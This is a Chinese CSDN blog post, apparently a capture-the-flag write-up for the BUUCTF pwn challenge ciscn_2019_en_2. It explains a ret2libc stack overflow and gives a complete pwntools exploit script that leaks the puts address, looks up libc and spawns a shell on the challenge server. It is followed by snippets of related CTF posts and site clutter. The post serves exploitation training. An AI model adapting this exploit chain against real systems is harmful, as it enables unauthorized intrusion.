BUUCTF ciscn_2019_en_2

最新推荐文章于 2023-05-06 18:23:03 发布
最新推荐文章于 2023-05-06 18:23:03 发布
阅读量2.2k 收藏 1
点赞数
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/carol2358/article/details/105402942
版权

这题整体的思路是ret2libc
先checksec
在这里插入图片描述
理一下题目:
在这里插入图片描述
在这里插入图片描述
只有功能1是能用的,输入1,来到encrypt函数,输入s,因为后面有strlen,所以\0截断,溢出为0x58
exp:

from pwn import *
from LibcSearcher import *

context.os='linux' 
context.arch='amd64' 
context.log_level='debug' 

r = remote('node3.buuoj.cn',25795)
#r = process('./ciscn_2019_en_2')
elf = ELF('./ciscn_2019_en_2')
puts_plt = elf.plt['puts']
puts_got = elf.got['puts']
main_addr = 0x400B28
ret = 0x0000000000400C84
pop_di = 0x0000000000400c83 # pop rdi ; ret
r.sendlineafter('choice!\n','1')
p = flat(['\0', 'a'*0x57, pop_di, puts_got, puts_plt, main_addr])
r.sendlineafter('encrypted\n',p)
r.recvline()
r.recvline()
#puts_addr = u64(r.recv(8))
puts_addr=u64(r.recvuntil('\n')[:-1].ljust(8,'\0'))
#puts_addr= u64(r.recvline()[:-1].ljust(8, '\x00'))
#print(puts_addr)
#print(hex(puts_addr))
libc = LibcSearcher('puts', puts_addr)
libcbase = puts_addr - libc.dump('puts')
sys_addr = libcbase + libc.dump('system')
binsh_addr = libcbase + libc.dump('str_bin_sh')
r.sendlineafter('choice!\n','1')
p = flat(['\0', 'a'*0x57, ret,  pop_di, binsh_addr, sys_addr])
r.sendlineafter('encrypted\n',p)
r.interactive()

需要注意的是接受puts_addr好像不能写u64(r.recv(8)),会通过不了

真岛忍
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 3
    评论
en_rx.rar_V2
09-21
mlx4 en alloc frags for Linux v2.13.6.
[BUUCTF]ciscn_2019_en_2解题思路
ctfpwn的博客
05-08 253
接下来通过计算偏移和libcsearcher拿到libc版本从而泄露system和bin/sh然后栈溢出获得shell。先用ROPgadget --binary fliename --only 'pop|ret' 找找gadgets。通过读c伪代码可以看出先是一个嵌套循环,然后输入v4的值,根据v4值来执行下面的代码。其中的0x4009A0是用来泄露puts函数的地址后返回encrypt函数再次运行。希望思路对各位有所帮助(本人真的很菜),如有不足请各位佬们指点。很明显有个gets函数的栈溢出。
ciscn_2019_en_2
m0_62322730的博客
05-06 65
ciscn_2019_en_2
BUUCTF 刷题 ciscn_2019_en_21
Helloity的博客
02-07 550
ctf刷题
buuctf|ciscn_2019_en_2 1
m0_64236521的博客
05-02 627
ciscn_2019_en_2 1 下载后我重命名为pwn_14了 checksec一下 nx开启,可以栈溢出 64位,用ida看看 分析下,只有输入‘1’有用,即encrypt函数较为重要,进入encrypt 有gets(s),可以进行栈溢出,没有找到后门函数。 那基本思路有了,这里可以栈溢出,但要绕过strlen判断,之后就是基本的ROP,ret2libc。 exp如下 from pwn import* from LibcSearcher import* context(os='linux', ar
【CTF】ciscn_2019_en_2
凉水的博客
01-26 3735
解题思路: 1 先反编译,粗略看了下,溢出点应该在encrypt函数里(只贴关键部分): void encrypt(char *__block,int __edflag) { size_t sVar1; long lVar2; ulong uVar3; undefined8 *puVar4; undefined8 local_58 [9]; ... *(undefined2 *)puVar4 = 0; puts("Input your Plaintext to be encr
[CTF]BUUCTF-PWN-ciscn_2019_en_2
weixin_53394081的博客
04-11 234
【CTF】BUUCTF-ciscn_2019_en_2 pwn
[BUUCTF]PWN9——ciscn_2019_en_2
mcmuyanga的博客
08-26 553
[BUUCTF]PWN9——ciscn_2019_en_2 题目网址:https://buuoj.cn/challenges#ciscn_2019_en_2 步骤: 例行检查,64位,开启了NX保护 nc一下看看程序的执行大概流程,看这个模样很眼熟 ida查看了一下程序,确定了跟之前的 [BUUCTF]PWN6——ciscn_2019_c_1 一样,具体的看那题的链接 exp: from pwn import* from LibcSearcher import* r=remote('node3.buu
en_netdev.rar_V2
09-20
must be called with local bh disable()d for Linux v2.13.6.
N140HCE_EN2校色文件
04-02
7500k色温红蜘蛛校色
scada_5.8.3_full_en
08-02
scada_5.8.3_full_en
CTF:PHP MD5绕过和序列化漏洞
06-25 1363
CTF:PHP MD5绕过和序列化漏洞 作者:高玉涵 博客:blog.csdn.net/cg_i 时间:2021.6.25 9:51 题目复现Docker环境: https://github.com/glzjin/buusec_2019_code_review_1 生命因为有限所以宝贵;因为有限,所以才要不懈努力。 ——名侦探柯南 源码 第一关:MD5绕过漏洞 CTF就是一个“套娃”游戏。首先我们把注意力集中到if(md5($_POST[‘md51’]) == ...
[BUUCTF-pwn] ciscn_2019_ne_2
weixin_52640415的博客
11-03 487
自从300题后,难题让人搜不着,也有极简单的题,今天遇到一个 概况: c++写的程序,反汇编后一个字符串有1米长 冒: 6个字符依次或或6-1得到 H@QRPN free未清指针 步骤: 输入"NEUQRO" 开始 建80,70,10(/bin/sh\x00) free90 八次 70两次 show 0得到libc 建70 三次,依次写free_hook,x,system free 1 from pwn import * elf = ELF('./pwn') context.arch
ciscn_2019_n_1 ——两种解法
qq_41696518的博客
07-13 2460
ciscn_2019_n_1 两种解法
node-v18.18.2-headers.tar.xz
最新发布
05-20
Node.js,简称Node,是一个开源且跨平台的JavaScript运行时环境,它允许在浏览器外运行JavaScript代码。Node.js于2009年由Ryan Dahl创立,旨在创建高性能的Web服务器和网络应用程序。它基于Google Chrome的V8 JavaScript引擎,可以在Windows、Linux、Unix、Mac OS X等操作系统上运行。 Node.js的特点之一是事件驱动和非阻塞I/O模型,这使得它非常适合处理大量并发连接,从而在构建实时应用程序如在线游戏、聊天应用以及实时通讯服务时表现卓越。此外,Node.js使用了模块化的架构,通过npm(Node package manager,Node包管理器),社区成员可以共享和复用代码,极大地促进了Node.js生态系统的发展和扩张。 Node.js不仅用于服务器端开发。随着技术的发展,它也被用于构建工具链、开发桌面应用程序、物联网设备等。Node.js能够处理文件系统、操作数据库、处理网络请求等,因此,开发者可以用JavaScript编写全栈应用程序,这一点大大提高了开发效率和便捷性。 在实践中,许多大型企业和组织已经采用Node.js作为其Web应用程序的开发平台,如Netflix、PayPal和Walmart等。它们利用Node.js提高了应用性能,简化了开发流程,并且能更快地响应市场需求。
vi_attr_send_end_en
12-17
vi_attr_send_end_en是指在视觉识别方面的属性发送结束。在计算机视觉领域,vi_attr_send_end_en表示当一个视觉识别系统完成了对特定对象或场景的识别和分析,并且将相应的属性信息发送结束。这意味着系统已经提取出...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 3
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值